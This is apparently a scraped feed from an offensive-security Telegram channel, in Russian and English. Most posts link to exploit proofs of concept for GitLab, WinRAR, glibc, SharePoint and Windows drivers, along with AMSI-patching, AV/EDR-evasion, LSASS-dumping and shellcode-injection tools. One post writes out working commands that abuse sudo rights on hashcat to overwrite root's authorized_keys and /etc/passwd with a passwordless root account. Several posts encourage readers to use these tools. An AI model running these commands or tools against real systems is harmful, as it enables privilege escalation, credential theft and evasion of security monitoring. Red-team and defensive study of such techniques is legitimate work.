This media is not supported in your browser
VIEW IN TELEGRAM
⚛️ Nuclei Templates AI Generator
Nuclei Template Editor - AI-powered hub to create, debug, scan, and store templates. Covering a wide array of vulnerabilities using public templates & rich CVE data.
📝 Note:
Current focus is HTTP, more protocols coming soon
🌐 Source:
https://templates.nuclei.sh
https://docs.nuclei.sh/editor
#nuclei #template #generator
Nuclei Template Editor - AI-powered hub to create, debug, scan, and store templates. Covering a wide array of vulnerabilities using public templates & rich CVE data.
📝 Note:
Current focus is HTTP, more protocols coming soon
🌐 Source:
https://templates.nuclei.sh
https://docs.nuclei.sh/editor
#nuclei #template #generator
🔥14❤🔥3❤3
Forwarded from RedTeam brazzers (Миша)
Недавно нашел интересную функцию DebugActiveProcess , которая позволяет текущему процессу стать дебаггером (обрабатывать всякие дебаг события) для другого процесса. Ну и в голову пришла идея: "А что если применить это на powershell и обрабатывать LOAD_DLL_DEBUG_EVENT, перехватывать загрузку amsi.dll и патчить ее на лету?" . Таким образом родился проект DebugAmsi , который позволяет запускать процесс powershell.exe с автоматическим патчем amsi. Причем я постарался избавить Вас от нужды чистки строк, обфускации их и прочей жести. В файлике strhide реализован алгоритм по шифрованию всех строк проекта во время компиляции с помощью XOR. Алгоритм вынесен в два отдельных милых макроса -
Пользуйтесь на здоровье😚
h() (для шифрования ASCII строк) и hW() (для шифрования юникода). Пользуйтесь на здоровье😚
❤🔥12👍3🔥1
⚔️ GitLab CE/EE Preauth RCE (CVE-2021-22205)
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
❗️Affect Versions:
https://github.com/inspiringz/CVE-2021-22205
#gitlab #rce #cve
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
❗️Affect Versions:
>=11.9, <13.8.8🌐 Source:
>=13.9, <13.9.6
>=13.10, <13.10.3
https://github.com/inspiringz/CVE-2021-22205
#gitlab #rce #cve
🔥4❤🔥2👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
WinRAR <= 6.22: code execution PoC
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
#git #exploit #pentest #redteam #fishing #initial
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
#git #exploit #pentest #redteam #fishing #initial
👍6
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Хорошая статья от MDSec, как они "редтимили" разработчиков. Наиболее интересный момент - это разработка и публикация вредоносного расширения VSCode для фишинга и получения первоначального доступа.
https://www.mdsec.co.uk/2023/08/leveraging-vscode-extensions-for-initial-access/
#redteam #pentest #pishing #initial
https://www.mdsec.co.uk/2023/08/leveraging-vscode-extensions-for-initial-access/
#redteam #pentest #pishing #initial
MDSec
Leveraging VSCode Extensions for Initial Access - MDSec
Introduction On a recent red team engagement, MDSec were tasked with crafting a phishing campaign for initial access. The catch was that the in-scope phishing targets were developers with technical...
👍8
🐱 GTFOBins в Hashcat
Сегодня мы рассмотрим достаточно интересный(и в какой-то степени банальный) способ как можно использовать Hashcat для обхода локальных ограничений безопасности.
Предположим, у нас есть низко привилегированный доступ к Linux системе под пользователем "Acrono", и этот пользователь имеет права root для выполнения команды Hashcat без ввода пароля:
🐚 SSH Abuse
Данная атака позволит нам добавить наш SSH-ключ в список авторизованных ключей root, обойдя парольную аутентификацию:
Данная атака позволяет создать нового пользователя без пароля с правами root в файле
Вероятность получить подобные привилегии в реальной жизни крайне мала, однако я лично столкнулся с этим не так давно. Я также не смог найти в интернетах похожего абуза, потому и решил опубликовать данный пост.
Сегодня мы рассмотрим достаточно интересный
Предположим, у нас есть низко привилегированный доступ к Linux системе под пользователем "Acrono", и этот пользователь имеет права root для выполнения команды Hashcat без ввода пароля:
(root) NOPASSWD: /usr/bin/hashcat -m
Мы можем воспользоваться этой привилегией в Hashcat, взяв MD5-сумму от необходимой нами строки, после чего перебирая хеш по известному "словарю" и записывая вывод в определенный файл.🐚 SSH Abuse
Данная атака позволит нам добавить наш SSH-ключ в список авторизованных ключей root, обойдя парольную аутентификацию:
key='<PUBLIC_SSH_KEY>'
echo -n "$key" > wordlist && echo -n "$key" | md5sum | awk '{print $1}' > hash
sudo hashcat -m 0 -a 0 --quiet --potfile-disable -o /root/.ssh/authorized_keys --outfile-format=2 hash wordlist
ssh -i ./id_ed25519 [email protected]
🔑 Passwd AbuseДанная атака позволяет создать нового пользователя без пароля с правами root в файле
/etc/passwd:create_user='pwn-user::0:0:root:/root:/bin/bash'
echo -n "$create_user" > wordlist && echo -n "$create_user" | md5sum | awk '{print $1}' > hash
sudo hashcat -m 0 -a 0 --quiet --potfile-disable -o /etc/passwd --outfile-format=2 --outfile-autohex-disable hash wordlist
su - pwn-user
Кстати, немногие знают, что Hashcat поддерживает режим "сервера". Если у вас есть пароль от сервера и вы наверняка знаете, что сервер работает от привилегированного пользователя, то SSH Abuse может оказаться полезным:hashcat --brain-server --brain-host=0.0.0.0 --brain-port=1337 --brain-password=P@ssw0rd
P.S.Вероятность получить подобные привилегии в реальной жизни крайне мала, однако я лично столкнулся с этим не так давно. Я также не смог найти в интернетах похожего абуза, потому и решил опубликовать данный пост.
👍21🔥9❤🔥5❤3👎3
Forwarded from 1N73LL1G3NC3
CVE-2023-28229
Service Elevation of Privilege Vulnerability in Windows CNG Key Isolation
https://github.com/Y3A/CVE-2023-28229
Reference: https://whereisk0shl.top/post/isolate-me-from-sandbox-explore-elevation-of-privilege-of-cng-key-isolation
Service Elevation of Privilege Vulnerability in Windows CNG Key Isolation
https://github.com/Y3A/CVE-2023-28229
Reference: https://whereisk0shl.top/post/isolate-me-from-sandbox-explore-elevation-of-privilege-of-cng-key-isolation
👍4
This media is not supported in your browser
VIEW IN TELEGRAM
🔄 Active Directory GPOs through NTLM relaying, and more!
Learn about a attack vector that exploits GPOs through NTLM relaying, potentially allowing unauthenticated attackers to abuse.
🌐 Source:
https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more
#ad #gpo #relay #ntlm
Learn about a attack vector that exploits GPOs through NTLM relaying, potentially allowing unauthenticated attackers to abuse.
🌐 Source:
https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more
#ad #gpo #relay #ntlm
🔥10👍3
Forwarded from Offensive Xwitter
😈 [ Clandestine @akaclandestine ]
𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾
🔗 Part 1 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
🔗 Part 2 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
🔗 Part 3 - https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
🔗 Part 4 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e
🐥 [ tweet ]
𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾
🔗 Part 1 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
🔗 Part 2 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
🔗 Part 3 - https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
🔗 Part 4 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e
🐥 [ tweet ]
❤🔥7👍2
Forwarded from 1N73LL1G3NC3
Caro-Kann
Encrypted shellcode Injection to avoid Kernel triggered memory scans
https://github.com/S3cur3Th1sSh1t/Caro-Kann
Encrypted shellcode Injection to avoid Kernel triggered memory scans
https://github.com/S3cur3Th1sSh1t/Caro-Kann
🔥7👍1
😈 POSTDump
This is the C# / .NET implementation of the ReactOS minidump function (like nanodump), thus avoiding call to the Windows API MiniDumpWriteDump function.
🚀 Key Features:
— Usage of indirect syscall along with halo's gate technic to retrieve syscalls IDs
— No memory Allocation/Protection call is performed for indirect syscall, instead, free RWX codecave found in the current process are used
— ETW patching
— No call to MiniDumpWriteDump
🌐 Source:
https://github.com/YOLOP0wn/POSTDump
#windows #lsass #dump #syscall #reactos
This is the C# / .NET implementation of the ReactOS minidump function (like nanodump), thus avoiding call to the Windows API MiniDumpWriteDump function.
🚀 Key Features:
— Usage of indirect syscall along with halo's gate technic to retrieve syscalls IDs
— No memory Allocation/Protection call is performed for indirect syscall, instead, free RWX codecave found in the current process are used
— ETW patching
— No call to MiniDumpWriteDump
🌐 Source:
https://github.com/YOLOP0wn/POSTDump
#windows #lsass #dump #syscall #reactos
🔥7👍2
A recently discovered vulnerability, CVE-2023-36845, affects Juniper SRX firewalls and EX switches, allowing for remote code execution without writing to the disk
🔍 Scanner:
https://github.com/vulncheck-oss/cve-2023-36845-scanner
🌐 Research:
https://vulncheck.com/blog/juniper-cve-2023-36845
#juniper #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥8❤1👍1
⚙ WTS API Wasteland — Token Impersonation In Another Level
A new research about a technique for lateral movement by stealing tokens while abusing the RPC named pipe
https://github.com/OmriBaso/WTSImpersonator
📝 Research:
https://medium.com/@omribaso/wts-api-wasteland-remote-token-impersonation-in-another-level-a23965e8227e
#ad #windows #token #impersonate
A new research about a technique for lateral movement by stealing tokens while abusing the RPC named pipe
\\pipe\LSM_API_service
🌐 PoC:https://github.com/OmriBaso/WTSImpersonator
📝 Research:
https://medium.com/@omribaso/wts-api-wasteland-remote-token-impersonation-in-another-level-a23965e8227e
#ad #windows #token #impersonate
🔥5❤1👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam #git
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam #git
GitHub
GitHub - Chocapikk/CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege Vulnerability
Microsoft SharePoint Server Elevation of Privilege Vulnerability - Chocapikk/CVE-2023-29357
👍5
⚙️ Windows LPE in driver MSKSSRV.SYS
CVE-2023-29360 is a Local Privilege Escalation (LPE) vulnerability found in the mskssrv driver. It allows attackers to gain direct access to kernel memory by exploiting improper validation of a user-supplied value.
🌐 PoC:
https://github.com/Nero22k/cve-2023-29360
📝 Research:
https://big5-sec.github.io/posts/CVE-2023-29360-analysis/
#windows #lpe #driver #mskssrv
CVE-2023-29360 is a Local Privilege Escalation (LPE) vulnerability found in the mskssrv driver. It allows attackers to gain direct access to kernel memory by exploiting improper validation of a user-supplied value.
🌐 PoC:
https://github.com/Nero22k/cve-2023-29360
📝 Research:
https://big5-sec.github.io/posts/CVE-2023-29360-analysis/
#windows #lpe #driver #mskssrv
👍4🔥3
Forwarded from 1N73LL1G3NC3
NetExec
This tool is based on CrackMapExec and was originally created by bytebleeder and maintained by mpgn over the years, shout out to them! With the retirement of mpgn, we decided to maintain the tool NetExec, formerly known as CrackMapExec, as a completely free open source tool.
Today will be our first release of NetExec version 1.0.0
NetExec wiki
This tool is based on CrackMapExec and was originally created by bytebleeder and maintained by mpgn over the years, shout out to them! With the retirement of mpgn, we decided to maintain the tool NetExec, formerly known as CrackMapExec, as a completely free open source tool.
Today will be our first release of NetExec version 1.0.0
NetExec wiki
👍7🔥4
Forwarded from r0 Crew (Channel)
Local Privilege Escalation in the glibc's ld.so (CVE-2023-4911)
https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
POC: https://github.com/leesh3288/CVE-2023-4911
#expdev #linux #lpe #Alexs3y
https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
POC: https://github.com/leesh3288/CVE-2023-4911
#expdev #linux #lpe #Alexs3y
GitHub
GitHub - leesh3288/CVE-2023-4911: PoC for CVE-2023-4911
PoC for CVE-2023-4911. Contribute to leesh3288/CVE-2023-4911 development by creating an account on GitHub.
👍5🔥2
🍀 MSIFortune - Local Privilege Escalation with MSI Installers
MSI installers are still pretty alive today. It is a lesser known feature, that a low privileged user can start the repair function of an installation which will run with SYSTEM privileges. What could go wrong? Quite a lot!
The repair function often triggers CustomActions, which can lead to several potential issues:
— Visible conhost.exe via a cmd.exe or other console binaries
— Visible PowerShell
— Directly actions from the installer with SYSTEM privileges
— Executing binaries from user writable paths
— DLL sideloading / search path abusing
— Missing PowerShell parameters, mostly -NoProfile
— Execution of other tools in an unsafe manner
🌐 Details:
https://badoption.eu/blog/2023/10/03/MSIFortune.html
#windows #msi #lpe
MSI installers are still pretty alive today. It is a lesser known feature, that a low privileged user can start the repair function of an installation which will run with SYSTEM privileges. What could go wrong? Quite a lot!
The repair function often triggers CustomActions, which can lead to several potential issues:
— Visible conhost.exe via a cmd.exe or other console binaries
— Visible PowerShell
— Directly actions from the installer with SYSTEM privileges
— Executing binaries from user writable paths
— DLL sideloading / search path abusing
— Missing PowerShell parameters, mostly -NoProfile
— Execution of other tools in an unsafe manner
🌐 Details:
https://badoption.eu/blog/2023/10/03/MSIFortune.html
#windows #msi #lpe
🔥9❤1👍1